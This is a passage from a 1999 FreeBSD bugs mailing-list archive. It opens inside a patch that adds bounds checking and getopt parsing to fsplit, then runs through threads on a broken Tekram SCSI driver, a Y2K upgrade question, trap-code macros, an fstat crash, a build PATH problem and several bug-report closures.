SYNOPSIS .Nm fsplit .Op Fl e Ar efile @@ -47,8 +47,8 @@ .Op Ar file .Sh DESCRIPTION .Nm Fsplit -takes as input either a file or standard input containing Fortran source code. -It attempts to split the input into separate routine files of the +takes as input either a file or standard input containing Fortran 77 source +code. It attempts to split the input into separate routine files of the form .Ar name.f , where @@ -104,3 +104,7 @@ .Fl e for unnamed main programs and block data subprograms since you must predict the created file name. +.Pp +.Nm +can be used with Fortran 77 and older source code. It understands neither +Fortran 90/95 syntax nor free form source files. diff -r -u /usr/src/usr.bin/fsplit/fsplit.c fsplit/fsplit.c --- /usr/src/usr.bin/fsplit/fsplit.c Tue Sep 7 11:59:34 1999 +++ fsplit/fsplit.c Tue Dec 14 10:59:13 1999 @@ -51,6 +51,7 @@ #include #include #include +#include #include #include #include @@ -90,11 +91,8 @@ #define TRUE 1 #define FALSE 0 -int extr = FALSE, - extrknt = -1, - extrfnd[100]; -char extrbuf[1000], - *extrnames[100]; +int extr = FALSE, extrknt = -1, *extrfnd; +char **extrnames; struct stat sbuf; #define trim(p) while (*p == ' ' || *p == '\t') p++ @@ -103,58 +101,74 @@ void get_name __P((char *, int)); char *functs __P((char *)); int lend __P((void)); -int lname __P((char *)); +int lname __P((char *, int)); char *look __P((char *, char *)); int saveit __P((char *)); -int scan_name __P((char *, char *)); +int scan_name __P((char *, char *, int)); char *skiplab __P((char *)); static void usage __P((void)); int main(argc, argv) +int argc; char **argv; { + extern int optind; + extern char *optarg; + register FILE *ofp; /* output file */ register int rv; /* 1 if got card in output file, 0 otherwise */ register char *ptr; int nflag, /* 1 if got name of subprog., 0 otherwise */ retval, i; - char name[20], - *extrptr = extrbuf; + char name[20]; - /* scan -e options */ - while ( argc > 1 && argv[1][0] == '-' && argv[1][1] == 'e') { + if (argc > 2) { extr = TRUE; - ptr = argv[1] + 2; - if(!*ptr) { - argc--; - argv++; - if(argc <= 1) + + extrfnd = (int *) malloc(argc * sizeof(int)); + if (extrfnd == NULL) + errx(1, NULL); + + extrnames = (char **) malloc(argc * sizeof(char *)); + if (extrnames == NULL) + errx(1, NULL); + + while ((i = getopt(argc, argv, "e:")) != -1) { + switch (i) { + case 'e': + extrknt++; + extrfnd[extrknt] = FALSE; + extrnames[extrknt] = optarg; + break; + default: usage(); - ptr = argv[1]; + } } - extrknt = extrknt + 1; - extrnames[extrknt] = extrptr; - extrfnd[extrknt] = FALSE; - while(*ptr) *extrptr++ = *ptr++; - *extrptr++ = 0; + + argc -= optind; + argv += optind; + } else { argc--; argv++; } - if (argc > 2) + if (argc > 1) usage(); - else if (argc == 2) { - if ((ifp = fopen(argv[1], "r")) == NULL) - errx(1, "cannot open %s", argv[1]); + else if (argc == 1) { + if ((ifp = fopen(*argv, "r")) == NULL) + errx(1, "cannot open %s", *argv); } else ifp = stdin; + for(;;) { /* look for a temp file that doesn't correspond to an existing file */ get_name(x, 3); ofp = fopen(x, "w"); + if (ofp == NULL) + errx(1, "can not open %s", x); nflag = 0; rv = 0; while (getline() > 0) { @@ -163,7 +177,7 @@ if (lend()) /* look for an 'end' statement */ break; if (nflag == 0) /* if no name yet, try and find one */ - nflag = lname(name); + nflag = lname(name, 20); } fclose(ofp); if (rv == 0) { /* no lines in file, forget the file */ @@ -198,6 +212,8 @@ else unlink(x); } + + return 0; } static void @@ -293,8 +309,9 @@ name and put in arg string. invent name for unnamed block datas and main programs. */ int -lname(s) +lname(s, len) char *s; +int len; { # define LINESIZE 80 register char *ptr, *p; @@ -324,18 +341,18 @@ if ((ptr = look(line, "subroutine")) != 0 || (ptr = look(line, "function")) != 0 || (ptr = functs(line)) != 0) { - if(scan_name(s, ptr)) return(1); + if(scan_name(s, ptr, len)) return(1); strcpy( s, x); } else if((ptr = look(line, "program")) != 0) { - if(scan_name(s, ptr)) return(1); + if(scan_name(s, ptr, len)) return(1); get_name( mainp, 4); strcpy( s, mainp); } else if((ptr = look(line, "blockdata")) != 0) { - if(scan_name(s, ptr)) return(1); + if(scan_name(s, ptr, len)) return(1); get_name( blkp, 6); strcpy( s, blkp); } else if((ptr = functs(line)) != 0) { - if(scan_name(s, ptr)) return(1); + if(scan_name(s, ptr, len)) return(1); strcpy( s, x); } else { get_name( mainp, 4); @@ -345,17 +362,22 @@ } int -scan_name(s, ptr) +scan_name(s, ptr, len) char *s, *ptr; +int len; { + int cnt = 0; char *sptr; /* scan off the name */ trim(ptr); sptr = s; while (*ptr != '(' && *ptr != '\n') { - if (*ptr != ' ' && *ptr != '\t') + if (*ptr != ' ' && *ptr != '\t') { *sptr++ = *ptr; + cnt++; + if (cnt == len - 3) break; + } ptr++; } To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 12:36:15 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from netcom.com (netcom5.netcom.com [199.183.9.105]) by hub.freebsd.org (Postfix) with ESMTP id 006CF150ED; Tue, 14 Dec 1999 12:36:13 -0800 (PST) (envelope-from klh@netcom.com) Received: (from klh@localhost) by netcom.com (8.9.3/8.9.3) id MAA29697; Tue, 14 Dec 1999 12:36:10 -0800 (PST) Date: Tue, 14 Dec 99 12:36:10 PST From: Ken Harrenstien To: "Justin T. Gibbs" Cc: Ken Harrenstien , freebsd-bugs@FreeBSD.ORG Subject: Re: kern/15446: Unpredictable enabling of SCSI Tagged Queueing In-Reply-To: Your message of Tue, 14 Dec 1999 07:24:23 -0700 Message-ID: Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > amd0: >. > rev 0x02 int a irq 11 on pci0.12.0 > > This is your problem. The driver supplied by Tekram had several little > problems in it. In -current and -stable, there is a driver that has > received a few cleanup passes and hopefully addresses these problems. > > -- > Justin Great, that's exactly what I was hoping to hear! Do you know whether these cleanups made it onto the 3.3 release? It looks like they did according to the amd.c log info from cvsweb; I rather hope so as I recently bought the 3.3 CD set, but can download -stable if you think that's better. Either way will report results... Thanks, --Ken To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 13:50: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2353014C0F for ; Tue, 14 Dec 1999 13:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA14757; Tue, 14 Dec 1999 13:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 14 Dec 1999 13:50:02 -0800 (PST) Message-Id: <199912142150.NAA14757@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Johan Karlsson Subject: Re: kern/15346: lkm no longer works after 3.3 Reply-To: Johan Karlsson Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15346; it has been noted by GNATS. From: Johan Karlsson To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: kern/15346: lkm no longer works after 3.3 Date: Tue, 14 Dec 1999 22:45:54 +0100 Please close. Duplicate of kern/15345 /K -- Johan Karlsson mailto:k@numeri.campus.luth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 14:54:10 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from mail.ext0.pacificaccess.com.au (mail.ext0.pacificaccess.com.au [203.89.229.72]) by hub.freebsd.org (Postfix) with ESMTP id B3F371534D for ; Tue, 14 Dec 1999 14:53:46 -0800 (PST) (envelope-from VBelhami@pacificaccess.com.au) Received: from gw-mailhub.pacificaccess.com.au (gw-mailhub.pacificaccess.com.au [161.117.19.198]) by mail.ext0.pacificaccess.com.au (8.9.3/8.9.3) with ESMTP id JAA10763 for ; Wed, 15 Dec 1999 09:55:11 +1100 (EST) (envelope-from VBelhami@pacificaccess.com.au) Received: from gw-exg-hub01.pacificaccess.com.au (gw-exg-hub01.pacificaccess.com.au [161.117.19.185]) by gw-mailhub.pacificaccess.com.au (8.9.3/8.9.3) with ESMTP id JAA49152 for ; Wed, 15 Dec 1999 09:53:31 +1100 (EST) (envelope-from VBelhami@Exchange.PacificAccess.com.au) Received: by gw-exg-hub01.pacificaccess.com.au with Internet Mail Service (5.5.2448.0) id ; Wed, 15 Dec 1999 09:52:48 +1100 Message-ID: From: "Belhamine, Vaughan" To: "'freebsd-bugs@FreeBSD.ORG'" Subject: freebsd v2.2.6 Date: Wed, 15 Dec 1999 09:50:20 +1100 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org My company is currently running freebsd 2.2.6 on a DNS, Mail and monitoring boxes. Does this software need to be upgraded/patched. Vaughan Belhamine Y2K Project Manager New Media Pacific Access Phone: 0392813576 Fax:03 92813910 Mobile: 0411 236 215 Email: vbelhami@pacificaccess.com.au To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 15: 0: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5477B152F9 for ; Tue, 14 Dec 1999 15:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA21630; Tue, 14 Dec 1999 15:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from cx281057-a.irvn1.occa.home.com (cx281057-a.irvn1.occa.home.com [24.5.32.114]) by hub.freebsd.org (Postfix) with ESMTP id 84B0A15435 for ; Tue, 14 Dec 1999 14:53:35 -0800 (PST) (envelope-from housel@cx281057-a.irvn1.occa.home.com) Received: (from housel@localhost) by cx281057-a.irvn1.occa.home.com (8.9.3/8.9.3) id OAA85416; Tue, 14 Dec 1999 14:53:19 -0800 (PST) (envelope-from housel) Message-Id: <199912142253.OAA85416@cx281057-a.irvn1.occa.home.com> Date: Tue, 14 Dec 1999 14:53:19 -0800 (PST) From: housel@acm.org Reply-To: housel@acm.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: i386/15488: Incorrect FPE_*_TRAP macros in machine/trap.h Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15488 >Category: i386 >Synopsis: Incorrect FPE_*_TRAP macros in machine/trap.h >Confidential: no >Severity: non-critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Dec 14 15:00:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Peter S. Housel >Release: FreeBSD 4.0-CURRENT i386 >Organization: None >Environment: * from: @(#)trap.h 5.4 (Berkeley) 5/9/91 * $FreeBSD: src/sys/i386/include/trap.h,v 1.10 1999/08/28 00:44:27 peter Exp $ >Description: The following sets of trap codes do not appear to be consistent. Using the FPE_*_TRAP constants in a trap handler gives incorrect results. #define FPE_INTDIV 1 /* integer divide by zero */ #define FPE_INTOVF 2 /* integer overflow */ #define FPE_FLTDIV 3 /* floating point divide by zero */ #define FPE_FLTOVF 4 /* floating point overflow */ #define FPE_FLTUND 5 /* floating point underflow */ #define FPE_FLTRES 6 /* floating point inexact result */ #define FPE_FLTINV 7 /* invalid floating point operation */ #define FPE_FLTSUB 8 /* subscript out of range */ #define FPE_INTOVF_TRAP 0x1 /* integer overflow */ #define FPE_INTDIV_TRAP 0x2 /* integer divide by zero */ #define FPE_FLTDIV_TRAP 0x3 /* floating/decimal divide by zero */ #define FPE_FLTOVF_TRAP 0x4 /* floating overflow */ #define FPE_FLTUND_TRAP 0x5 /* floating underflow */ #define FPE_FPU_NP_TRAP 0x6 /* floating point unit not present */ #define FPE_SUBRNG_TRAP 0x7 /* subrange out of bounds */ >How-To-Repeat: Write a trap handler for integer overflow or integer divide by zero. >Fix: Base "depreciated" macros on the updated ones? >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 16: 7:32 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 42E3F14E8C; Tue, 14 Dec 1999 16:07:31 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA29643; Tue, 14 Dec 1999 16:07:31 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Tue, 14 Dec 1999 16:07:31 -0800 (PST) From: Message-Id: <199912150007.QAA29643@freefall.freebsd.org> To: m.seaman@inpharmatica.co.uk, cpiazza@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/12243: NFS re-mount from Solaris 7 server hangs Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: NFS re-mount from Solaris 7 server hangs State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Tue Dec 14 16:06:59 PST 1999 State-Changed-Why: Originator reports that the problem can't be reproduced on 3.4-RC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 16:10:10 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9B8DE15395; Tue, 14 Dec 1999 16:10:09 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA30178; Tue, 14 Dec 1999 16:10:09 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Tue, 14 Dec 1999 16:10:09 -0800 (PST) From: Message-Id: <199912150010.QAA30178@freefall.freebsd.org> To: j_guojun@lbl.gov, cpiazza@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/15346: lkm no longer works after 3.3 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: lkm no longer works after 3.3 State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Tue Dec 14 16:08:49 PST 1999 State-Changed-Why: Duplicate of PR 15345 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 19:22:57 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from mta4.rcsntx.swbell.net (mta4.rcsntx.swbell.net [151.164.30.28]) by hub.freebsd.org (Postfix) with ESMTP id E94F5152E6 for ; Tue, 14 Dec 1999 19:22:55 -0800 (PST) (envelope-from chris@holly.dyndns.org) Received: from holly.dyndns.org ([216.62.157.60]) by mta4.rcsntx.swbell.net (Sun Internet Mail Server sims.3.5.1999.09.16.21.57.p8) with ESMTP id <0FMR002TLIQ4WL@mta4.rcsntx.swbell.net> for freebsd-bugs@FreeBSD.ORG; Tue, 14 Dec 1999 21:22:52 -0600 (CST) Received: (from chris@localhost) by holly.dyndns.org (8.9.3/8.9.3) id VAA08852; Tue, 14 Dec 1999 21:25:16 -0600 (CST envelope-from chris) X-URL: http://www.FreeBSD.org/~chris/ Date: Tue, 14 Dec 1999 21:25:16 -0600 From: Chris Costello Subject: Re: freebsd v2.2.6 In-reply-to: To: "Belhamine, Vaughan" Cc: "'freebsd-bugs@FreeBSD.ORG'" Reply-To: chris@calldei.com Message-id: <19991214212516.C868@holly.calldei.com> MIME-version: 1.0 Content-type: text/plain; charset=us-ascii User-Agent: Mutt/0.96.4i X-Operating-System: FreeBSD 4.0-CURRENT (i386) References: Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Dec 15, 1999, Belhamine, Vaughan wrote: > My company is currently running freebsd 2.2.6 on a DNS, Mail and monitoring > boxes. Does this software need to be upgraded/patched. I'm assuming by your title that you're asking for Y2K info. Yes. See http://www.FreeBSD.org/ -- |Chris Costello |Going the speed of light is bad for your age. `--------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 19:53:58 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from cc158233-a.catv1.md.home.com (cc158233-a.catv1.md.home.com [24.3.25.17]) by hub.freebsd.org (Postfix) with ESMTP id 7F8FB152C1 for ; Tue, 14 Dec 1999 19:53:55 -0800 (PST) (envelope-from sjr@home.net) Received: from istari.home.net (localhost.home.net [127.0.0.1]) by cc158233-a.catv1.md.home.com (8.9.3/8.9.3) with ESMTP id WAA15571 for ; Tue, 14 Dec 1999 22:53:51 -0500 (EST) (envelope-from sjr@cc158233-a.catv1.md.home.com) Message-Id: <199912150353.WAA15571@cc158233-a.catv1.md.home.com> Date: Tue, 14 Dec 1999 22:53:49 -0500 (EST) From: "Stephen J. Roznowski" Subject: Re: Problem building -current (gnu/usr.bin/binutils/doc) To: freebsd-bugs@FreeBSD.ORG MIME-Version: 1.0 Content-Type: TEXT/plain; charset=us-ascii Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The other day I posted a problem building .../gnu/usr.bin/binutils/doc: ... gzip -cn annotate.info > annotate.info.gz ln -sf /usr/src/gnu/usr.bin/binutils/doc/../../../../contrib/gdb/gdb/doc/all-cfg.texi gdb-cfg.texi cp /usr/src/gnu/usr.bin/binutils/doc/../../../../contrib/libreadline/doc/hsuser.texinfo inc-hist.texi patch -b .orig < /usr/src/gnu/usr.bin/binutils/doc/inc-hist.diff patch: **** can't find file `.orig' : No such file or directory *** Error code 2 Stop in /usr/src/gnu/usr.bin/binutils/doc. *** Error code 1 ... I was able to track this problem down to having ports/patch installed (/usr/local/bin/patch) and my build was picking up this version of patch vice the /usr/bin/patch one.... Perhaps "make buildworld" should specify a PATH variable? Removing this port fixed my problem..... -SR To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 22: 0: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6778614BE1 for ; Tue, 14 Dec 1999 22:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id WAA61524; Tue, 14 Dec 1999 22:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from shell01.prophetnetworks.net (shell01.prophetnetworks.net [63.71.252.10]) by hub.freebsd.org (Postfix) with ESMTP id 73BD815329 for ; Tue, 14 Dec 1999 21:55:34 -0800 (PST) (envelope-from bvaughn@shell01.prophetnetworks.net) Received: (from bvaughn@localhost) by shell01.prophetnetworks.net (8.9.3/8.9.3) id AAA02283; Wed, 15 Dec 1999 00:54:30 GMT (envelope-from bvaughn) Message-Id: <199912150054.AAA02283@shell01.prophetnetworks.net> Date: Wed, 15 Dec 1999 00:54:30 GMT From: bvaughn@prophetnetworks.net Reply-To: bvaughn@prophetnetworks.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/15489: fstat Bus Error in 3.4-RC Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15489 >Category: kern >Synopsis: running fstat causes a bus error >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Dec 14 22:00:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Ben Vaughn >Release: FreeBSD 3.4-RC i386 >Organization: >Environment: Dell Workstation 410, SMP, SCSI, Lotsa RAM >Description: First saw this when trying to run a sockstat. fstat Bus Errors, allowing not all of the current sockets to be viewed. >How-To-Repeat: Run fstat or sockstat on a machine with a lot of processes. >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 23:20: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3B61915473 for ; Tue, 14 Dec 1999 23:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA67802; Tue, 14 Dec 1999 23:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 14 Dec 1999 23:20:02 -0800 (PST) Message-Id: <199912150720.XAA67802@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Kenneth D. Merry" Subject: Re: kern/15446: Unpredictable enabling of SCSI Tagged Queueing Reply-To: "Kenneth D. Merry" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15446; it has been noted by GNATS. From: "Kenneth D. Merry" To: Ken Harrenstien Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: kern/15446: Unpredictable enabling of SCSI Tagged Queueing Date: Wed, 15 Dec 1999 00:11:29 -0700 On Tue, Dec 14, 1999 at 02:29:52 -0800, Ken Harrenstien wrote: > > > > My guess is that somehow the tagged queueing bit is being enabled and > > disabled in the drive firmware. None of the other ways of tweaking the > > tagged queueing settings would explain the behavior you're seeing. > > > > Check the settings in mode page 10 with camcontrol and see whether the > > drive says tagged queueing is enabled or disabled. If the DQue bit is set, > > the drive should not be reported as a tagged queueing drive in the dmesg. > > > > If the DQue bit is set and then cleared somehow between boots on your > > system, that points fairly strongly to some sort of problem with the drive. > > Examining mode page 10 as you suggest reveals no changes between > boots, although the system's idea of the tagged queueing status > continues to vary. > > More interestingly, a "camcontrol inquiry" shows all 4 of the drives > as having Tagged Queueing. This information also does not change > between boots. That is very interesting. It points to a driver problem I think. > lnc1: rev 0x02 int b irq 10 on pci0.11.0 > lnc1: PCnet-32 VL-Bus address 00:80:5f:e4:96:18 > amd0: rev 0x02 int a irq 11 on pci0.12.0 And, as Justin already pointed out, the driver is most likely your problem. Tekram's default amd driver has a few problems, and you'll probably want Justin's reworked version of that driver. I believe it went in just before 3.3. It may not be in GENERIC in 3.3, however. It will be turned on by default for 3.4, and for any -stable snapshot. You have several options as far as drivers go: - Grab the -stable driver and put it on your system, and recompile your kernel. You should just need src/sys/pci/amd.{c,h}. You'll also need to change sys/conf/files so that the amd driver points to amd.c instead of tek390.c. You can get the -stable driver here: ftp://ftp.FreeBSD.ORG/pub/FreeBSD/branches/3.0-stable/src/sys/pci - Upgrade to 3.3, -stable or 3.4, which should be out shortly. If you don't want to wait, stable snapshots are located here: ftp://current.FreeBSD.ORG/pub/FreeBSD/snapshots/i386 - Upgrade to -current. Snapshots are available at the same place as the stable snapshots. This isn't recommended for most folks, but if you're ready to deal with the requirements, it might be fun: http://www.freebsd.org/handbook/cutting-edge.html#CURRENT Anyway, let me know whether an updated driver fixes your problem. Ken -- Kenneth Merry ken@kdm.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 23:20:13 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 719DA15477 for ; Tue, 14 Dec 1999 23:20:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA67812; Tue, 14 Dec 1999 23:20:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 14 Dec 1999 23:20:04 -0800 (PST) Message-Id: <199912150720.XAA67812@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Kenneth D. Merry" Subject: Re: kern/15448: Would be nice if the kernel could detect/report problems with SCSI tagged queueing Reply-To: "Kenneth D. Merry" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15448; it has been noted by GNATS. From: "Kenneth D. Merry" To: Ken Harrenstien Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: kern/15448: Would be nice if the kernel could detect/report problems with SCSI tagged queueing Date: Wed, 15 Dec 1999 00:19:13 -0700 On Tue, Dec 14, 1999 at 00:37:04 -0800, Ken Harrenstien wrote: > > I don't know why the kernel didn't print out any errors, but you'll get a > > lot more information if you boot with the '-v' switch. At the boot loader > > prompt, you can type: > > > > boot kernel -v > > I know about (and like) -v, but it doesn't make any difference. Which > is to say, there is no error output either way. Just user-level I/O > errors except when a page transfer fails, in which case the pager code > then complains. Never the CAM subsystem. > > One way of verifying this might be to test with a known broken drive > after re-enabling tagged queueing, and see what happens in the way of > error reporting. > > Unfortunately I don't have any of the ones in the current table or I > could do that test. Regardless of the actual cause of the I/O errors, > it is still worrisome to me that there is no kernel log output at all. I think the reason you're not seeing any kernel diagnostics is because the driver isn't reporting errors to the upper level code. It may be that it is just silently failing to return some buffers or something. Since we already know the Tekram AMD driver is broken (PR readers see PR 15446), I suppose this isn't very surprising. In most cases, booting with the verbose switch turned on causes more SCSI diagnostics to be printed than would normally be printed. Anyway, why don't we leave this PR open, and you can verify that you get more diagnostics when you upgrade to the newer amd driver, and then we can close it. Ken -- Kenneth Merry ken@kdm.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 23:20: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4A5EF15474 for ; Tue, 14 Dec 1999 23:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA67807; Tue, 14 Dec 1999 23:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 14 Dec 1999 23:20:03 -0800 (PST) Message-Id: <199912150720.XAA67807@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Kenneth D. Merry" Subject: Re: kern/15447: Seagate ST32550 (Barracuda 2LP) may be a broken tagged queueing drive? Reply-To: "Kenneth D. Merry" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15447; it has been noted by GNATS. From: "Kenneth D. Merry" To: Ken Harrenstien Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: kern/15447: Seagate ST32550 (Barracuda 2LP) may be a broken tagged queueing drive? Date: Wed, 15 Dec 1999 00:13:04 -0700 On Tue, Dec 14, 1999 at 04:58:33 -0800, Ken Harrenstien wrote: > Because of your statement that the ST32550 is known to work, and the > fact that my Fujitsu was failing in the same way, I don't think the > drives are at fault. So we're left with either the controller, or > FreeBSD 3.1's support of it, or something else. The controller seems > unlikely since Tagged Queueing is a higher-level protocol and there's > no reason to suspect either the physical bus or the link-level > protocol (otherwise many more problems would have evinced themselves). > > One more data point. I use the same kernel source base in another > system (NCR 53c895, 3 IBM drives) where all drives are TQ-enabled and > have never had problems despite much heavier usage. > > I'm starting to think that whatever is causing the kernel to be > spastic about whether or not to use Tagged Queueing (cf kern/15446) > may also be responsible for its failure to operate properly. In any > case, since the ST32550 is no longer a suspect, I suggest that this > bug (kern/15447) be closed and the above information made a follow-up > to kern/15446. Thanks for all the detailed information. Based on PR kern/15447, I think we can close this and assume for now that this is a problem with Tekram's amd driver. Ken -- Kenneth Merry ken@kdm.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 14 23:32: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 657B1153BF; Tue, 14 Dec 1999 23:32:04 -0800 (PST) (envelope-from ken@FreeBSD.org) Received: (from ken@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA68798; Tue, 14 Dec 1999 23:32:04 -0800 (PST) (envelope-from ken@FreeBSD.org) Date: Tue, 14 Dec 1999 23:32:04 -0800 (PST) From: Message-Id: <199912150732.XAA68798@freefall.freebsd.org> To: klh@netcom.com, ken@FreeBSD.org, freebsd-bugs@FreeBSD.org, ken@FreeBSD.org Subject: Re: kern/15447: Seagate ST32550 (Barracuda 2LP) may be a broken tagged queueing drive? Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Seagate ST32550 (Barracuda 2LP) may be a broken tagged queueing drive? State-Changed-From-To: open->closed State-Changed-By: ken State-Changed-When: Tue Dec 14 23:31:11 PST 1999 State-Changed-Why: Closed at the request of the submitter. See PR kern/15446 for additional followup information on this problem. Responsible-Changed-From-To: freebsd-bugs->ken Responsible-Changed-By: ken Responsible-Changed-When: Tue Dec 14 